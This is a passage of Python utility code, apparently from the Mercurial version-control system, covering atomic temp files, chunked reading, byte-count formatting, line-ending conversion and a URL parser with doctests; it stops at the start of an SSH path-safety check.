2028 2033         False.
2029 2034
2030 2035 Otherwise, this returns True, as "ambiguity is avoided".
2031 2036 """
2032 2037 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2033 2038 try:
2034 2039 os.utime(path, (advanced, advanced))
2035 2040 except OSError as inst:
2036 2041 if inst.errno == errno.EPERM:
2037 2042 # utime() on the file created by another user causes EPERM,
2038 2043 # if a process doesn't have appropriate privileges
2039 2044 return False
2040 2045 raise
2041 2046 return True
2042 2047
2043 2048 def __ne__(self, other):
2044 2049 return not self == other
2045 2050
2046 2051 class atomictempfile(object):
2047 2052 '''writable file object that atomically updates a file
2048 2053
2049 2054 All writes will go to a temporary copy of the original file. Call
2050 2055 close() when you are done writing, and atomictempfile will rename
2051 2056 the temporary copy to the original name, making the changes
2052 2057 visible. If the object is destroyed without being closed, all your
2053 2058 writes are discarded.
2054 2059
2055 2060 checkambig argument of constructor is used with filestat, and is
2056 2061 useful only if target file is guarded by any lock (e.g. repo.lock
2057 2062 or repo.wlock).
2058 2063 '''
2059 2064 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2060 2065 self.__name = name # permanent name
2061 2066 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2062 2067 createmode=createmode)
2063 2068 self._fp = posixfile(self._tempname, mode)
2064 2069 self._checkambig = checkambig
2065 2070
2066 2071 # delegated methods
2067 2072 self.read = self._fp.read
2068 2073 self.write = self._fp.write
2069 2074 self.seek = self._fp.seek
2070 2075 self.tell = self._fp.tell
2071 2076 self.fileno = self._fp.fileno
2072 2077
2073 2078 def close(self):
2074 2079 if not self._fp.closed:
2075 2080 self._fp.close()
2076 2081 filename = localpath(self.__name)
2077 2082 oldstat = self._checkambig and filestat.frompath(filename)
2078 2083 if oldstat and oldstat.stat:
2079 2084 rename(self._tempname, filename)
2080 2085 newstat = filestat.frompath(filename)
2081 2086 if newstat.isambig(oldstat):
2082 2087 # stat of changed file is ambiguous to original one
2083 2088 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2084 2089 os.utime(filename, (advanced, advanced))
2085 2090 else:
2086 2091 rename(self._tempname, filename)
2087 2092
2088 2093 def discard(self):
2089 2094 if not self._fp.closed:
2090 2095 try:
2091 2096 os.unlink(self._tempname)
2092 2097 except OSError:
2093 2098 pass
2094 2099 self._fp.close()
2095 2100
2096 2101 def __del__(self):
2097 2102 if safehasattr(self, '_fp'): # constructor actually did something
2098 2103 self.discard()
2099 2104
2100 2105 def __enter__(self):
2101 2106 return self
2102 2107
2103 2108 def __exit__(self, exctype, excvalue, traceback):
2104 2109 if exctype is not None:
2105 2110 self.discard()
2106 2111 else:
2107 2112 self.close()
2108 2113
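# Usage sketch (hypothetical file name): as a context manager, the
# temporary copy replaces the original only if the block exits cleanly, so
# readers never observe a partially written file.
#
#   with atomictempfile(b'config.new') as fp:
#       fp.write(b'[section]\nkey = value\n')
#   # close() has renamed the temporary file over b'config.new'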
2109 2114 def unlinkpath(f, ignoremissing=False, rmdir=True):
2110 2115 """unlink and remove the directory if it is empty"""
2111 2116 if ignoremissing:
2112 2117 tryunlink(f)
2113 2118 else:
2114 2119 unlink(f)
2115 2120 if rmdir:
2116 2121 # try removing directories that might now be empty
2117 2122 try:
2118 2123 removedirs(os.path.dirname(f))
2119 2124 except OSError:
2120 2125 pass
2121 2126
2122 2127 def tryunlink(f):
2123 2128 """Attempt to remove a file, ignoring ENOENT errors."""
2124 2129 try:
2125 2130 unlink(f)
2126 2131 except OSError as e:
2127 2132 if e.errno != errno.ENOENT:
2128 2133 raise
2129 2134
2130 2135 def makedirs(name, mode=None, notindexed=False):
2131 2136 """recursive directory creation with parent mode inheritance
2132 2137
2133 2138 Newly created directories are marked as "not to be indexed by
2134 2139 the content indexing service", if ``notindexed`` is specified
2135 2140 for "write" mode access.
2136 2141 """
2137 2142 try:
2138 2143 makedir(name, notindexed)
2139 2144 except OSError as err:
2140 2145 if err.errno == errno.EEXIST:
2141 2146 return
2142 2147 if err.errno != errno.ENOENT or not name:
2143 2148 raise
2144 2149 parent = os.path.dirname(os.path.abspath(name))
2145 2150 if parent == name:
2146 2151 raise
2147 2152 makedirs(parent, mode, notindexed)
2148 2153 try:
2149 2154 makedir(name, notindexed)
2150 2155 except OSError as err:
2151 2156 # Catch EEXIST to handle races
2152 2157 if err.errno == errno.EEXIST:
2153 2158 return
2154 2159 raise
2155 2160 if mode is not None:
2156 2161 os.chmod(name, mode)
2157 2162
2158 2163 def readfile(path):
2159 2164 with open(path, 'rb') as fp:
2160 2165 return fp.read()
2161 2166
2162 2167 def writefile(path, text):
2163 2168 with open(path, 'wb') as fp:
2164 2169 fp.write(text)
2165 2170
2166 2171 def appendfile(path, text):
2167 2172 with open(path, 'ab') as fp:
2168 2173 fp.write(text)
2169 2174
2170 2175 class chunkbuffer(object):
2171 2176 """Allow arbitrary sized chunks of data to be efficiently read from an
2172 2177 iterator over chunks of arbitrary size."""
2173 2178
2174 2179 def __init__(self, in_iter):
2175 2180 """in_iter is the iterator that's iterating over the input chunks."""
2176 2181 def splitbig(chunks):
2177 2182 for chunk in chunks:
2178 2183 if len(chunk) > 2**20:
2179 2184 pos = 0
2180 2185 while pos < len(chunk):
2181 2186 end = pos + 2 ** 18
2182 2187 yield chunk[pos:end]
2183 2188 pos = end
2184 2189 else:
2185 2190 yield chunk
2186 2191 self.iter = splitbig(in_iter)
2187 2192 self._queue = collections.deque()
2188 2193 self._chunkoffset = 0
2189 2194
2190 2195 def read(self, l=None):
2191 2196 """Read L bytes of data from the iterator of chunks of data.
2192 2197 Returns less than L bytes if the iterator runs dry.
2193 2198
2194 2199 If size parameter is omitted, read everything"""
2195 2200 if l is None:
2196 2201 return ''.join(self.iter)
2197 2202
2198 2203 left = l
2199 2204 buf = []
2200 2205 queue = self._queue
2201 2206 while left > 0:
2202 2207 # refill the queue
2203 2208 if not queue:
2204 2209 target = 2**18
2205 2210 for chunk in self.iter:
2206 2211 queue.append(chunk)
2207 2212 target -= len(chunk)
2208 2213 if target <= 0:
2209 2214 break
2210 2215 if not queue:
2211 2216 break
2212 2217
2213 2218 # The easy way to do this would be to queue.popleft(), modify the
2214 2219 # chunk (if necessary), then queue.appendleft(). However, for cases
2215 2220 # where we read partial chunk content, this incurs 2 dequeue
2216 2221 # mutations and creates a new str for the remaining chunk in the
2217 2222 # queue. Our code below avoids this overhead.
2218 2223
2219 2224 chunk = queue[0]
2220 2225 chunkl = len(chunk)
2221 2226 offset = self._chunkoffset
2222 2227
2223 2228 # Use full chunk.
2224 2229 if offset == 0 and left >= chunkl:
2225 2230 left -= chunkl
2226 2231 queue.popleft()
2227 2232 buf.append(chunk)
2228 2233 # self._chunkoffset remains at 0.
2229 2234 continue
2230 2235
2231 2236 chunkremaining = chunkl - offset
2232 2237
2233 2238 # Use all of unconsumed part of chunk.
2234 2239 if left >= chunkremaining:
2235 2240 left -= chunkremaining
2236 2241 queue.popleft()
2237 2242 # offset == 0 is enabled by block above, so this won't merely
2238 2243 # copy via ``chunk[0:]``.
2239 2244 buf.append(chunk[offset:])
2240 2245 self._chunkoffset = 0
2241 2246
2242 2247 # Partial chunk needed.
2243 2248 else:
2244 2249 buf.append(chunk[offset:offset + left])
2245 2250 self._chunkoffset += left
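                # left < chunkremaining in this branch, so this drives left
                # negative and terminates the loop.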
2246 2251 left -= chunkremaining
2247 2252
2248 2253 return ''.join(buf)
2249 2254
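# Usage sketch: reads of any size are served across chunk boundaries.
#
#   >>> cb = chunkbuffer(iter([b'foo', b'barbaz']))
#   >>> cb.read(4)
#   'foob'
#   >>> cb.read(5)
#   'arbaz'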
2250 2255 def filechunkiter(f, size=131072, limit=None):
2251 2256 """Create a generator that produces the data in the file size
2252 2257 (default 131072) bytes at a time, up to optional limit (default is
2253 2258 to read all data). Chunks may be less than size bytes if the
2254 2259 chunk is the last chunk in the file, or the file is a socket or
2255 2260 some other type of file that sometimes reads less data than is
2256 2261 requested."""
2257 2262 assert size >= 0
2258 2263 assert limit is None or limit >= 0
2259 2264 while True:
2260 2265 if limit is None:
2261 2266 nbytes = size
2262 2267 else:
2263 2268 nbytes = min(limit, size)
2264 2269 s = nbytes and f.read(nbytes)
2265 2270 if not s:
2266 2271 break
2267 2272 if limit:
2268 2273 limit -= len(s)
2269 2274 yield s
2270 2275
2271 2276 class cappedreader(object):
2272 2277 """A file object proxy that allows reading up to N bytes.
2273 2278
2274 2279 Given a source file object, instances of this type allow reading up to
2275 2280 N bytes from that source file object. Attempts to read past the allowed
2276 2281 limit are treated as EOF.
2277 2282
2278 2283 It is assumed that I/O is not performed on the original file object
2279 2284 in addition to I/O that is performed by this instance. If there is,
2280 2285 state tracking will get out of sync and unexpected results will ensue.
2281 2286 """
2282 2287 def __init__(self, fh, limit):
2283 2288 """Allow reading up to <limit> bytes from <fh>."""
2284 2289 self._fh = fh
2285 2290 self._left = limit
2286 2291
2287 2292 def read(self, n=-1):
2288 2293 if not self._left:
2289 2294 return b''
2290 2295
2291 2296 if n < 0:
2292 2297 n = self._left
2293 2298
2294 2299 data = self._fh.read(min(n, self._left))
2295 2300 self._left -= len(data)
2296 2301 assert self._left >= 0
2297 2302
2298 2303 return data
2299 2304
2300 2305 def readinto(self, b):
2301 2306 res = self.read(len(b))
2302 2307 if res is None:
2303 2308 return None
2304 2309
2305 2310 b[0:len(res)] = res
2306 2311 return len(res)
2307 2312
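# Usage sketch: reads stop at the configured limit even though the
# underlying file object has more data.
#
#   >>> import io
#   >>> r = cappedreader(io.BytesIO(b'abcdef'), 4)
#   >>> r.read()
#   'abcd'
#   >>> r.read(1)             # past the limit: treated as EOF
#   ''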
2308 2313 def unitcountfn(*unittable):
2309 2314 '''return a function that renders a readable count of some quantity'''
2310 2315
2311 2316 def go(count):
2312 2317 for multiplier, divisor, format in unittable:
2313 2318 if abs(count) >= divisor * multiplier:
2314 2319 return format % (count / float(divisor))
2315 2320 return unittable[-1][2] % count
2316 2321
2317 2322 return go
2318 2323
2319 2324 def processlinerange(fromline, toline):
2320 2325 """Check that linerange <fromline>:<toline> makes sense and return a
2321 2326 0-based range.
2322 2327
2323 2328 >>> processlinerange(10, 20)
2324 2329 (9, 20)
2325 2330 >>> processlinerange(2, 1)
2326 2331 Traceback (most recent call last):
2327 2332 ...
2328 2333 ParseError: line range must be positive
2329 2334 >>> processlinerange(0, 5)
2330 2335 Traceback (most recent call last):
2331 2336 ...
2332 2337 ParseError: fromline must be strictly positive
2333 2338 """
2334 2339 if toline - fromline < 0:
2335 2340 raise error.ParseError(_("line range must be positive"))
2336 2341 if fromline < 1:
2337 2342 raise error.ParseError(_("fromline must be strictly positive"))
2338 2343 return fromline - 1, toline
2339 2344
2340 2345 bytecount = unitcountfn(
2341 2346 (100, 1 << 30, _('%.0f GB')),
2342 2347 (10, 1 << 30, _('%.1f GB')),
2343 2348 (1, 1 << 30, _('%.2f GB')),
2344 2349 (100, 1 << 20, _('%.0f MB')),
2345 2350 (10, 1 << 20, _('%.1f MB')),
2346 2351 (1, 1 << 20, _('%.2f MB')),
2347 2352 (100, 1 << 10, _('%.0f KB')),
2348 2353 (10, 1 << 10, _('%.1f KB')),
2349 2354 (1, 1 << 10, _('%.2f KB')),
2350 2355 (1, 1, _('%.0f bytes')),
2351 2356 )
2352 2357
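# Worked examples for the table above: the first row whose threshold
# (multiplier * divisor) the value reaches selects the format, which is why
# larger values get fewer decimals.
#
#   >>> bytecount(2048)
#   '2.00 KB'
#   >>> bytecount(10240)
#   '10.0 KB'
#   >>> bytecount(300)
#   '300 bytes'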
2353 2358 class transformingwriter(object):
2354 2359 """Writable file wrapper to transform data by function"""
2355 2360
2356 2361 def __init__(self, fp, encode):
2357 2362 self._fp = fp
2358 2363 self._encode = encode
2359 2364
2360 2365 def close(self):
2361 2366 self._fp.close()
2362 2367
2363 2368 def flush(self):
2364 2369 self._fp.flush()
2365 2370
2366 2371 def write(self, data):
2367 2372 return self._fp.write(self._encode(data))
2368 2373
2369 2374 # Matches a single EOL which can either be a CRLF where repeated CR
2370 2375 # are removed or a LF. We do not care about old Macintosh files, so a
2371 2376 # stray CR is an error.
2372 2377 _eolre = remod.compile(br'\r*\n')
2373 2378
2374 2379 def tolf(s):
2375 2380 return _eolre.sub('\n', s)
2376 2381
2377 2382 def tocrlf(s):
2378 2383 return _eolre.sub('\r\n', s)
2379 2384
2380 2385 def _crlfwriter(fp):
2381 2386 return transformingwriter(fp, tocrlf)
2382 2387
2383 2388 if pycompat.oslinesep == '\r\n':
2384 2389 tonativeeol = tocrlf
2385 2390 fromnativeeol = tolf
2386 2391 nativeeolwriter = _crlfwriter
2387 2392 else:
2388 2393 tonativeeol = pycompat.identity
2389 2394 fromnativeeol = pycompat.identity
2390 2395 nativeeolwriter = pycompat.identity
2391 2396
2392 2397 if (pyplatform.python_implementation() == 'CPython' and
2393 2398 sys.version_info < (3, 0)):
2394 2399 # There is an issue in CPython that some IO methods do not handle EINTR
2395 2400 # correctly. The following table shows what CPython version (and functions)
2396 2401 # are affected (buggy: has the EINTR bug, okay: otherwise):
2397 2402 #
2398 2403 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2399 2404 # --------------------------------------------------
2400 2405 # fp.__iter__ | buggy | buggy | okay
2401 2406 # fp.read* | buggy | okay [1] | okay
2402 2407 #
2403 2408 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2404 2409 #
2405 2410 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2406 2411 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2407 2412 #
2408 2413 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2409 2414 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2410 2415 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2411 2416 # fp.__iter__ but not other fp.read* methods.
2412 2417 #
2413 2418 # On modern systems like Linux, the "read" syscall cannot be interrupted
2414 2419 # when reading "fast" files like on-disk files. So the EINTR issue only
2415 2420 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2416 2421 # files approximately as "fast" files and use the fast (unsafe) code path,
2417 2422 # to minimize the performance impact.
2418 2423 if sys.version_info >= (2, 7, 4):
2419 2424 # fp.readline deals with EINTR correctly, use it as a workaround.
2420 2425 def _safeiterfile(fp):
2421 2426 return iter(fp.readline, '')
2422 2427 else:
2423 2428 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2424 2429 # note: this may block longer than necessary because of bufsize.
2425 2430 def _safeiterfile(fp, bufsize=4096):
2426 2431 fd = fp.fileno()
2427 2432 line = ''
2428 2433 while True:
2429 2434 try:
2430 2435 buf = os.read(fd, bufsize)
2431 2436 except OSError as ex:
2432 2437 # os.read only raises EINTR before any data is read
2433 2438 if ex.errno == errno.EINTR:
2434 2439 continue
2435 2440 else:
2436 2441 raise
2437 2442 line += buf
2438 2443 if '\n' in buf:
2439 2444 splitted = line.splitlines(True)
2440 2445 line = ''
2441 2446 for l in splitted:
2442 2447 if l[-1] == '\n':
2443 2448 yield l
2444 2449 else:
2445 2450 line = l
2446 2451 if not buf:
2447 2452 break
2448 2453 if line:
2449 2454 yield line
2450 2455
2451 2456 def iterfile(fp):
2452 2457 fastpath = True
2453 2458 if type(fp) is file:
2454 2459 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2455 2460 if fastpath:
2456 2461 return fp
2457 2462 else:
2458 2463 return _safeiterfile(fp)
2459 2464 else:
2460 2465     # PyPy and CPython 3 do not have the EINTR issue, so no workaround is needed.
2461 2466 def iterfile(fp):
2462 2467 return fp
2463 2468
2464 2469 def iterlines(iterator):
2465 2470 for chunk in iterator:
2466 2471 for line in chunk.splitlines():
2467 2472 yield line
2468 2473
2469 2474 def expandpath(path):
2470 2475 return os.path.expanduser(os.path.expandvars(path))
2471 2476
2472 2477 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2473 2478 """Return the result of interpolating items in the mapping into string s.
2474 2479
2475 2480 prefix is a single character string, or a two character string with
2476 2481 a backslash as the first character if the prefix needs to be escaped in
2477 2482 a regular expression.
2478 2483
2479 2484 fn is an optional function that will be applied to the replacement text
2480 2485 just before replacement.
2481 2486
2482 2487     escape_prefix is an optional flag that allows a doubled prefix to act
2483 2488     as its own escape.
2484 2489 """
2485 2490 fn = fn or (lambda s: s)
2486 2491 patterns = '|'.join(mapping.keys())
2487 2492 if escape_prefix:
2488 2493 patterns += '|' + prefix
2489 2494 if len(prefix) > 1:
2490 2495 prefix_char = prefix[1:]
2491 2496 else:
2492 2497 prefix_char = prefix
2493 2498 mapping[prefix_char] = prefix_char
2494 2499 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2495 2500 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2496 2501
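# Usage sketch: each mapping key is substituted wherever it follows the
# prefix character.
#
#   >>> interpolate(b'%', {b'foo': b'bar'}, b'say %foo!')
#   'say bar!'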
2497 2502 def getport(port):
2498 2503 """Return the port for a given network service.
2499 2504
2500 2505 If port is an integer, it's returned as is. If it's a string, it's
2501 2506 looked up using socket.getservbyname(). If there's no matching
2502 2507 service, error.Abort is raised.
2503 2508 """
2504 2509 try:
2505 2510 return int(port)
2506 2511 except ValueError:
2507 2512 pass
2508 2513
2509 2514 try:
2510 2515 return socket.getservbyname(pycompat.sysstr(port))
2511 2516 except socket.error:
2512 2517 raise error.Abort(_("no port number associated with service '%s'")
2513 2518 % port)
2514 2519
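# Usage sketch: numeric strings pass straight through, while service names
# are resolved via the system services database (so b'http' maps to 80 on
# typical systems).
#
#   >>> getport(b'8080')
#   8080
#   >>> getport(b'http')
#   80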
2515 2520 class url(object):
2516 2521 r"""Reliable URL parser.
2517 2522
2518 2523 This parses URLs and provides attributes for the following
2519 2524 components:
2520 2525
2521 2526 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2522 2527
2523 2528 Missing components are set to None. The only exception is
2524 2529 fragment, which is set to '' if present but empty.
2525 2530
2526 2531 If parsefragment is False, fragment is included in query. If
2527 2532 parsequery is False, query is included in path. If both are
2528 2533 False, both fragment and query are included in path.
2529 2534
2530 2535 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2531 2536
2532 2537 Note that for backward compatibility reasons, bundle URLs do not
2533 2538 take host names. That means 'bundle://../' has a path of '../'.
2534 2539
2535 2540 Examples:
2536 2541
2537 2542 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2538 2543 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2539 2544 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2540 2545 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2541 2546 >>> url(b'file:///home/joe/repo')
2542 2547 <url scheme: 'file', path: '/home/joe/repo'>
2543 2548 >>> url(b'file:///c:/temp/foo/')
2544 2549 <url scheme: 'file', path: 'c:/temp/foo/'>
2545 2550 >>> url(b'bundle:foo')
2546 2551 <url scheme: 'bundle', path: 'foo'>
2547 2552 >>> url(b'bundle://../foo')
2548 2553 <url scheme: 'bundle', path: '../foo'>
2549 2554 >>> url(br'c:\foo\bar')
2550 2555 <url path: 'c:\\foo\\bar'>
2551 2556 >>> url(br'\\blah\blah\blah')
2552 2557 <url path: '\\\\blah\\blah\\blah'>
2553 2558 >>> url(br'\\blah\blah\blah#baz')
2554 2559 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2555 2560 >>> url(br'file:///C:\users\me')
2556 2561 <url scheme: 'file', path: 'C:\\users\\me'>
2557 2562
2558 2563 Authentication credentials:
2559 2564
2560 2565 >>> url(b'ssh://joe:xyz@x/repo')
2561 2566 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2562 2567 >>> url(b'ssh://joe@x/repo')
2563 2568 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2564 2569
2565 2570 Query strings and fragments:
2566 2571
2567 2572 >>> url(b'http://host/a?b#c')
2568 2573 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2569 2574 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2570 2575 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2571 2576
2572 2577 Empty path:
2573 2578
2574 2579 >>> url(b'')
2575 2580 <url path: ''>
2576 2581 >>> url(b'#a')
2577 2582 <url path: '', fragment: 'a'>
2578 2583 >>> url(b'http://host/')
2579 2584 <url scheme: 'http', host: 'host', path: ''>
2580 2585 >>> url(b'http://host/#a')
2581 2586 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2582 2587
2583 2588 Only scheme:
2584 2589
2585 2590 >>> url(b'http:')
2586 2591 <url scheme: 'http'>
2587 2592 """
2588 2593
2589 2594 _safechars = "!~*'()+"
2590 2595 _safepchars = "/!~*'()+:\\"
2591 2596 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2592 2597
2593 2598 def __init__(self, path, parsequery=True, parsefragment=True):
2594 2599 # We slowly chomp away at path until we have only the path left
2595 2600 self.scheme = self.user = self.passwd = self.host = None
2596 2601 self.port = self.path = self.query = self.fragment = None
2597 2602 self._localpath = True
2598 2603 self._hostport = ''
2599 2604 self._origpath = path
2600 2605
2601 2606 if parsefragment and '#' in path:
2602 2607 path, self.fragment = path.split('#', 1)
2603 2608
2604 2609 # special case for Windows drive letters and UNC paths
2605 2610 if hasdriveletter(path) or path.startswith('\\\\'):
2606 2611 self.path = path
2607 2612 return
2608 2613
2609 2614 # For compatibility reasons, we can't handle bundle paths as
2610 2615         # normal URLs
2611 2616 if path.startswith('bundle:'):
2612 2617 self.scheme = 'bundle'
2613 2618 path = path[7:]
2614 2619 if path.startswith('//'):
2615 2620 path = path[2:]
2616 2621 self.path = path
2617 2622 return
2618 2623
2619 2624 if self._matchscheme(path):
2620 2625 parts = path.split(':', 1)
2621 2626 if parts[0]:
2622 2627 self.scheme, path = parts
2623 2628 self._localpath = False
2624 2629
2625 2630 if not path:
2626 2631 path = None
2627 2632 if self._localpath:
2628 2633 self.path = ''
2629 2634 return
2630 2635 else:
2631 2636 if self._localpath:
2632 2637 self.path = path
2633 2638 return
2634 2639
2635 2640 if parsequery and '?' in path:
2636 2641 path, self.query = path.split('?', 1)
2637 2642 if not path:
2638 2643 path = None
2639 2644 if not self.query:
2640 2645 self.query = None
2641 2646
2642 2647 # // is required to specify a host/authority
2643 2648 if path and path.startswith('//'):
2644 2649 parts = path[2:].split('/', 1)
2645 2650 if len(parts) > 1:
2646 2651 self.host, path = parts
2647 2652 else:
2648 2653 self.host = parts[0]
2649 2654 path = None
2650 2655 if not self.host:
2651 2656 self.host = None
2652 2657 # path of file:///d is /d
2653 2658 # path of file:///d:/ is d:/, not /d:/
2654 2659 if path and not hasdriveletter(path):
2655 2660 path = '/' + path
2656 2661
2657 2662 if self.host and '@' in self.host:
2658 2663 self.user, self.host = self.host.rsplit('@', 1)
2659 2664 if ':' in self.user:
2660 2665 self.user, self.passwd = self.user.split(':', 1)
2661 2666 if not self.host:
2662 2667 self.host = None
2663 2668
2664 2669 # Don't split on colons in IPv6 addresses without ports
2665 2670 if (self.host and ':' in self.host and
2666 2671 not (self.host.startswith('[') and self.host.endswith(']'))):
2667 2672 self._hostport = self.host
2668 2673 self.host, self.port = self.host.rsplit(':', 1)
2669 2674 if not self.host:
2670 2675 self.host = None
2671 2676
2672 2677 if (self.host and self.scheme == 'file' and
2673 2678 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2674 2679 raise error.Abort(_('file:// URLs can only refer to localhost'))
2675 2680
2676 2681 self.path = path
2677 2682
2678 2683 # leave the query string escaped
2679 2684 for a in ('user', 'passwd', 'host', 'port',
2680 2685 'path', 'fragment'):
2681 2686 v = getattr(self, a)
2682 2687 if v is not None:
2683 2688 setattr(self, a, urlreq.unquote(v))
2684 2689
2685 2690 @encoding.strmethod
2686 2691 def __repr__(self):
2687 2692 attrs = []
2688 2693 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2689 2694 'query', 'fragment'):
2690 2695 v = getattr(self, a)
2691 2696 if v is not None:
2692 2697 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2693 2698 return '<url %s>' % ', '.join(attrs)
2694 2699
2695 2700 def __bytes__(self):
2696 2701 r"""Join the URL's components back into a URL string.
2697 2702
2698 2703 Examples:
2699 2704
2700 2705 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2701 2706 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2702 2707 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2703 2708 'http://user:pw@host:80/?foo=bar&baz=42'
2704 2709 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2705 2710 'http://user:pw@host:80/?foo=bar%3dbaz'
2706 2711 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2707 2712 'ssh://user:pw@[::1]:2200//home/joe#'
2708 2713 >>> bytes(url(b'http://localhost:80//'))
2709 2714 'http://localhost:80//'
2710 2715 >>> bytes(url(b'http://localhost:80/'))
2711 2716 'http://localhost:80/'
2712 2717 >>> bytes(url(b'http://localhost:80'))
2713 2718 'http://localhost:80/'
2714 2719 >>> bytes(url(b'bundle:foo'))
2715 2720 'bundle:foo'
2716 2721 >>> bytes(url(b'bundle://../foo'))
2717 2722 'bundle:../foo'
2718 2723 >>> bytes(url(b'path'))
2719 2724 'path'
2720 2725 >>> bytes(url(b'file:///tmp/foo/bar'))
2721 2726 'file:///tmp/foo/bar'
2722 2727 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2723 2728 'file:///c:/tmp/foo/bar'
2724 2729 >>> print(url(br'bundle:foo\bar'))
2725 2730 bundle:foo\bar
2726 2731 >>> print(url(br'file:///D:\data\hg'))
2727 2732 file:///D:\data\hg
2728 2733 """
2729 2734 if self._localpath:
2730 2735 s = self.path
2731 2736 if self.scheme == 'bundle':
2732 2737 s = 'bundle:' + s
2733 2738 if self.fragment:
2734 2739 s += '#' + self.fragment
2735 2740 return s
2736 2741
2737 2742 s = self.scheme + ':'
2738 2743 if self.user or self.passwd or self.host:
2739 2744 s += '//'
2740 2745 elif self.scheme and (not self.path or self.path.startswith('/')
2741 2746 or hasdriveletter(self.path)):
2742 2747 s += '//'
2743 2748 if hasdriveletter(self.path):
2744 2749 s += '/'
2745 2750 if self.user:
2746 2751 s += urlreq.quote(self.user, safe=self._safechars)
2747 2752 if self.passwd:
2748 2753 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2749 2754 if self.user or self.passwd:
2750 2755 s += '@'
2751 2756 if self.host:
2752 2757 if not (self.host.startswith('[') and self.host.endswith(']')):
2753 2758 s += urlreq.quote(self.host)
2754 2759 else:
2755 2760 s += self.host
2756 2761 if self.port:
2757 2762 s += ':' + urlreq.quote(self.port)
2758 2763 if self.host:
2759 2764 s += '/'
2760 2765 if self.path:
2761 2766 # TODO: similar to the query string, we should not unescape the
2762 2767 # path when we store it, the path might contain '%2f' = '/',
2763 2768 # which we should *not* escape.
2764 2769 s += urlreq.quote(self.path, safe=self._safepchars)
2765 2770 if self.query:
2766 2771 # we store the query in escaped form.
2767 2772 s += '?' + self.query
2768 2773 if self.fragment is not None:
2769 2774 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2770 2775 return s
2771 2776
2772 2777 __str__ = encoding.strmethod(__bytes__)
2773 2778
2774 2779 def authinfo(self):
2775 2780 user, passwd = self.user, self.passwd
2776 2781 try:
2777 2782 self.user, self.passwd = None, None
2778 2783 s = bytes(self)
2779 2784 finally:
2780 2785 self.user, self.passwd = user, passwd
2781 2786 if not self.user:
2782 2787 return (s, None)
2783 2788 # authinfo[1] is passed to urllib2 password manager, and its
2784 2789 # URIs must not contain credentials. The host is passed in the
2785 2790 # URIs list because Python < 2.4.3 uses only that to search for
2786 2791 # a password.
2787 2792 return (s, (None, (s, self.host),
2788 2793 self.user, self.passwd or ''))
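# Illustrative sketch (not part of this change): authinfo() yields a
# credential-free URI plus the stripped credentials, e.g. (assuming this
# module's namespace):
#
# >>> u = url(b'http://joe:xyz@example.com/repo')
# >>> u.authinfo()
# ('http://example.com/repo',
#  (None, ('http://example.com/repo', 'example.com'), 'joe', 'xyz'))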
2789 2794
2790 2795 def isabs(self):
2791 2796 if self.scheme and self.scheme != 'file':
2792 2797 return True # remote URL
2793 2798 if hasdriveletter(self.path):
2794 2799 return True # absolute for our purposes - can't be joined()
2795 2800 if self.path.startswith(br'\\'):
2796 2801 return True # Windows UNC path
2797 2802 if self.path.startswith('/'):
2798 2803 return True # POSIX-style
2799 2804 return False
2800 2805
2801 2806 def localpath(self):
2802 2807 if self.scheme == 'file' or self.scheme == 'bundle':
2803 2808 path = self.path or '/'
2804 2809 # For Windows, we need to promote hosts containing drive
2805 2810 # letters to paths with drive letters.
2806 2811 if hasdriveletter(self._hostport):
2807 2812 path = self._hostport + '/' + self.path
2808 2813 elif (self.host is not None and self.path
2809 2814 and not hasdriveletter(path)):
2810 2815 path = '/' + path
2811 2816 return path
2812 2817 return self._origpath
2813 2818
2814 2819 def islocal(self):
2815 2820 '''whether localpath will return something that posixfile can open'''
2816 2821 return (not self.scheme or self.scheme == 'file'
2817 2822 or self.scheme == 'bundle')
2818 2823
2819 2824 def hasscheme(path):
2820 2825 return bool(url(path).scheme)
2821 2826
2822 2827 def hasdriveletter(path):
2823 2828 return path and path[1:2] == ':' and path[0:1].isalpha()
2824 2829
2825 2830 def urllocalpath(path):
2826 2831 return url(path, parsequery=False, parsefragment=False).localpath()
2827 2832
2828 2833 def checksafessh(path):
